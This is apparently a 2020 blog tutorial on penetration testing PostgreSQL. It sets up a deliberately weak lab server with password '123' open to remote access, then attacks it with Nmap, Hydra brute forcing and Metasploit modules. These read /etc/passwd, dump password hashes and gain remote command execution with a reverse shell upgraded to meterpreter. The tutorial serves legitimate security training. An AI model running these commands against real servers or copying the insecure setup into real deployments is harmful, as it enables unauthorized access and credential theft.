Penetration Testing on PostgreSQL (5432)

at 3:44 AM Wednesday, August 5, 2020

In this post, we will demonstrate how to set-up our own Vulnerable PostgreSQL for penetration testing on Ubuntu 20.04 and How to conduct PostgreSQL penetration testing.
Table of Content
Pre-requisites
PostgreSQL Setup on Ubuntu 20.04
PostgreSQL Penetration Testing
Scanning: Nmap
Brute force: Hydra
Access Postgres Shell
Exploiting: Metasploit
·         Module 1: Postgres Readfile
·         Module 2: Banner Grabbing for Postgres_sql
·         Module 3: Dumping Password Hashes
·         Module 3: Dumping Password Hashes
·         Module 4:  Pwn Postgres Shell

Pre-requisites:

Target:  Ubuntu
Attacker: Kali Linux
PostgreSQL Setup on Ubuntu 20.04
PostgreSQL is an open-source and advanced object-oriented relational database which is also known as Postgres. It is a powerful high-performance database management system released under a flexible BSD-style license.
In order to configure PostgreSQL in your Ubuntu platform, there are some prerequisites required for installation.
§  Ubuntu 20.04
§  Root Privileges
Install PostgreSQL and All Dependencies
PostgreSQL are available in the Ubuntu repository. So you just need to install them with the apt command.
apt install postgresql postgresql-client



on the time of installation, a prompt will display on your system that will ask you to confirm the installation process that either you want to continue or not. You need to press ‘y’ to continue the installation.
Once installation is completed, start the PostgreSQL service and add it to the system boot by entering following command
systemctl start postgresql.service
systemctl enable postgresql.service

Set PostgreSQL user password

You can create the user password for PostgreSQL. Using the following command, you can change the default user password for PostgreSQL. During this process a prompt display on your system that will ask you to enter the new password. After that, a conformation will be displayed ‘password updated successfully’. And then next, Now you will log in to database as a user or working shell using the following command:
passwd postgres
su -l postgres
psql



Create a database and user roles

You can create new databases and users using PostgreSQL shell as follows:
psql -c "alter user postgres with password '123' "
createuser -EPd ignite
createdb secret -O ignite
psql secret



Enter the following command to list the databases:
psql-l



PostgreSQL by default listens at Local Interface which is 127.0.0.1. But, for the remote access you need to some changes in configuration file. To Access the configuration file you will use the following command:
nano /etc/postgresql/12/main/postgresql.conf



under the connection settings you will set #listen_addresses= ‘*’



Now you will restart the PostgreSQL service by entering the following command
service postgresql restart



Let’s start Pentesting PostgreSQL

In this section, you will be learning how to compromise Databases credentials using different techniques.
Let’s fire up the Attacking machine kali-linux

Nmap

By-default PostgreSQL service is running on the port no. 5432, with the help of NMAP let’s identify the state of Port.
nmap -p5432  192.168.1.108



As you can see, it has shown Open state for postgresql at port 5432.
Hydra – A Brute Forcing Tool
Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely.
Let’s brute-force the target to perform this attack you should go with the following command where -L option enables dictionary for username parameter and -P options enables dictionary for the password list.
hydra -L user.txt -P pass.txt 192.168.1.108 postgres
As above you can see we have successfully dumped the credentials you can use these credentials in gaining access on the database.


 
Connect to Database Remotely
Kali Linux by default have the psql utility which allows you to authenticate with PostgreSQL database if the username and the password are already known.
As we have already right credentials of database
 psql -h 192.168.1.108 -U postgres



Metasploit
As we know Metasploit comes preinstalled with Kali Linux, so our first step is to get to the Metasploit console.
Module 1: Postgres Readfile
The postgres_readfile module, when provided with credentials (e.g. superuser account) for a PostgreSQL server, will read and display files of your choosing on the server.
msf > use auxiliary/admin/postgres/postgres_readfile
msf auxiliary(admin/postgres/postgres_readfile) > set rhosts 192.168.1.108
msf auxiliary(admin/postgres/postgres_readfile) > set rfile /etc/passwd
msf auxiliary(admin/postgres/postgres_readfile) > set password 123
msf auxiliary(admin/postgres/postgres_readfile) > exploit



Module 2: Banner Grabbing for Postgres_sql
The postgres_sql module, when provided with valid credentials for a PostgreSQL server, will perform queries of your choosing and return the results.
msf > use auxiliary/admin/postgres/postgres_sql
msf auxiliary(admin/postgres/postgres_sql) > set rhosts 192.168.1.108
msf auxiliary(admin/postgres/postgres_sql) > set username ignite
msf auxiliary(admin/postgres/postgres_sql) > set password 123
msf auxiliary(admin/postgres/postgres_sql) > exploit



Module 3: Dumping Password Hashes
As we have credentials of database admin then we use this one-liner exploit to dump all the user hashes in Metasploit:
msf use auxiliary/scanner/postgres/postgres_hashdump
msf auxiliary(scanner/postgres/postgres_hashdump) > set rhosts 192.168.1.108
msf auxiliary(scanner/postgres/postgres_hashdump) > set username postgres
msf auxiliary(scanner/postgres/postgres_hashdump) > set password 123
msf auxiliary(scanner/postgres/postgres_hashdump) > set exploit



Module 4:  Pwn Postgres Shell
Installations running Postgres 9.3 and above have functionality which allows for the superuser and users with 'pg_execute_server_program' to pipe to and from an external program using COPY. This allows arbitrary command execution as though you have console access. This module attempts to create a new table, then execute system commands in the context of copying the command output into the table
msf > exploit/multi/postgres/postgres_copy_from_program_cmd_exec
msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set rhosts 192.168.1.08
msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set lhost 192.168.1.111
msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set username postgres
msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set password 123
msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > exploit



Now we gained access on database, you can observe that here we obtain command session and latter we have upgrade it into meterpreter sessions.
msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > run
msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > sessions
msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > sessions -u 1
msf exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > sessions 2


Now we have full access on database, in this way we can test for postgres loopholes and submit the findings to the network admin 😊.
Labels:

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)